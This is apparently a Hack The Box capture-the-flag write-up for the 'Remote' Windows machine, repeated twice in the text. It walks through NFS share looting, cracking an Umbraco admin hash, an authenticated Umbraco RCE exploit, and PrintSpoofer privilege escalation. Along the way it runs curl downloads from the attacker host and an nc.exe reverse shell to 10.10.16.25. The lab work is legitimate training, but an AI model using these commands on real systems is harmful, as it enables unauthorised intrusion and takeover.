HTB - Remote

Scope

IP Address 10.10.10.180

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
5985/tcp open  wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan 

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-time: 
|   date: 2024-07-06T02:24:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous login

Service Enumeration

FTP

I noticed from Nmap that anonymous login is allowed but It didn't lead for anything

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]

SMB

SMB Enumeration didn't lead for anything, too

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip                   
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                        

SMB         10.10.10.180    445    REMOTE           [-] remote\: STATUS_ACCESS_DENIED

RPC

The Same as SMB :(

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip                                             
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

NFS

I Found 2049 port open which is used by network file system (NFS), So I'll check if there is any accessible folders

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip                      
Export list for 10.10.10.180:
/site_backups (everyone)

I Found an interesting folder, So I'll mount it to my host and see its content

──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt                                                                   

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups 

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers  App_Plugins  Global.asax  Umbraco         Views       aspnet_client  css           scripts
App_Data      Config       Media        Umbraco_Client  Web.config  bin            default.aspx

I tried to hunt for usernames & passwords, but nothing appears using grep command, So I searched online for Umbraco CMS and where it stores its credentials and I found this:

The CMS stores its credentials in Umbraco.sdf. After knowing this, I tried to open the file with text editor but it's binary file, so I list its content with strings and grep for credentials

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"

<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>

So the file says that the hash is SHA1, let's fire up hashcat and crack it after getting the hashcat mode

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa

[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt 

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx  

Session..........: hashcat
Status...........: Cracked

Initial Access

At http://10.10.10.180/umbraco/ there is a login form.

I logged in with the credentials found before, then looked for the webapp version

I decided to search for public CVE with searchsploit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco        
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>

I searched for poc on GitHub this match the version of the webapp and found this one:

I clone it locally and run the exploit

┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25

[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode

PS C:\windows\system32\inetsrv>

PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx

User flag 442f18b8accdec694dxxxxxxxxxxx

Privilege Escalation

When I typed whoami command and saw the output, I knew it's an easy win cause user iis apppool\defaultapppool often has SeImpersonatePrivilege which can be used to escalate to system using RoguePotato or PrintSpoofer

PS C:\Users\Public> whoami 
iis apppool\defaultapppool

Let's verify

PS C:\Users\Public> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

I downloaded PrintSpoofer.exe & nc.exe from my attack host

PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe

Easy win :)

PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719

PS C:\Windows\system32> whoami
nt authority\system

PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx

root flag 60ea8c532b06a17faxxxxxxxxxxxxxxx

PreviousHTB - Support NextHTB - Heist

Last updated 11 months ago

HTB - Remote

Scope

IP Address 10.10.10.180

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
5985/tcp open  wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan 

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-time: 
|   date: 2024-07-06T02:24:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous login

Service Enumeration

FTP

I noticed from Nmap that anonymous login is allowed but It didn't lead for anything

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]

SMB

SMB Enumeration didn't lead for anything, too

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip                   
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                        

SMB         10.10.10.180    445    REMOTE           [-] remote\: STATUS_ACCESS_DENIED

RPC

The Same as SMB :(

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip                                             
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

NFS

I Found 2049 port open which is used by network file system (NFS), So I'll check if there is any accessible folders

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip                      
Export list for 10.10.10.180:
/site_backups (everyone)

I Found an interesting folder, So I'll mount it to my host and see its content

──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt                                                                   

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups 

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers  App_Plugins  Global.asax  Umbraco         Views       aspnet_client  css           scripts
App_Data      Config       Media        Umbraco_Client  Web.config  bin            default.aspx

I tried to hunt for usernames & passwords, but nothing appears using grep command, So I searched online for Umbraco CMS and where it stores its credentials and I found this:

The CMS stores its credentials in Umbraco.sdf. After knowing this, I tried to open the file with text editor but it's binary file, so I list its content with strings and grep for credentials

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"

<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>

So the file says that the hash is SHA1, let's fire up hashcat and crack it after getting the hashcat mode

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa

[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt 

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx  

Session..........: hashcat
Status...........: Cracked

Initial Access

At http://10.10.10.180/umbraco/ there is a login form.

I logged in with the credentials found before, then looked for the webapp version

I decided to search for public CVE with searchsploit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco        
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>

I searched for poc on GitHub this match the version of the webapp and found this one:

GitHub - Jonoans/Umbraco-RCE: Umbraco CMS 7.12.4 - (Authenticated) Remote Code ExecutionGitHub

I clone it locally and run the exploit

┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25

[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode

PS C:\windows\system32\inetsrv>

PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx

User flag 442f18b8accdec694dxxxxxxxxxxx

Privilege Escalation

PS C:\Users\Public> whoami 
iis apppool\defaultapppool

Let's verify

PS C:\Users\Public> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

I downloaded PrintSpoofer.exe & nc.exe from my attack host

PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe

Easy win :)

PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719

PS C:\Windows\system32> whoami
nt authority\system

PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx

root flag 60ea8c532b06a17faxxxxxxxxxxxxxxx

PreviousHTB - Support NextHTB - Heist

Last updated 11 months ago